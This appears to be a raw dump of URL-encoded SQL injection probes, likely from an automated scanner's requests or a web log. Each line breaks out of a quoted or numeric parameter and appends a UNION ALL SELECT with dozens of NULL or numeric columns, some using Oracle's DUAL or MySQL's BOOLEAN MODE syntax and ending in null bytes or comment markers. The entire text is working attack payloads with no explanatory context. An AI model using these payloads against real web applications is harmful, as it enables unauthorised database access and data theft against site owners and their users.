1234.5%27%20%2B%20%28SELECT%20%27LpqO%27%20FROM%20DUAL%20WHERE%201724%3D1724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NXtD%27%20FROM%20DUAL%20WHERE%209179%3D9179%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ClaI%27%20FROM%20DUAL%20WHERE%205075%3D5075%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27xgRW%27%20FROM%20DUAL%20WHERE%207726%3D7726%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27gZXj%27%20FROM%20DUAL%20WHERE%209668%3D9668%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27OItC%27%20FROM%20DUAL%20WHERE%208794%3D8794%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27gwFB%27%20FROM%20DUAL%20WHERE%204132%3D4132%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27dZFA%27%20FROM%20DUAL%20WHERE%207457%3D7457%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mbeq%27%20WHERE%205921%3D5921%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qiHz%27%20WHERE%208027%3D8027%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uUaq%27%20WHERE%209017%3D9017%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ohib%27%20WHERE%204097%3D4097%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27zEcc%27%20WHERE%206582%3D6582%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27IrrS%27%20WHERE%208577%3D8577%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YlZi%27%20WHERE%208911%3D8911%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27EJBB%27%20WHERE%205109%3D5109%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27JJwA%27%20WHERE%203045%3D3045%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27zqYQ%27%20WHERE%205572%3D5572%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -1275%29%20UNION%20ALL%20SELECT%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%2C%206393%00 -2371%29%20UNION%20ALL%20SELECT%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%00 -9220%29%20UNION%20ALL%20SELECT%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%2C%202703%00 -9927%29%20UNION%20ALL%20SELECT%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%00 -1011%29%20UNION%20ALL%20SELECT%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%00 -3916%29%20UNION%20ALL%20SELECT%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%00 -3613%29%20UNION%20ALL%20SELECT%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%2C%203058%00 -7858%29%20UNION%20ALL%20SELECT%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%00 -5979%29%20UNION%20ALL%20SELECT%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%00 